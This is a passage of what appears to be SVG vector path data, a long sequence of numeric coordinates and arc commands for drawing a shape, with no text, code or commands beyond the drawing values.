6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.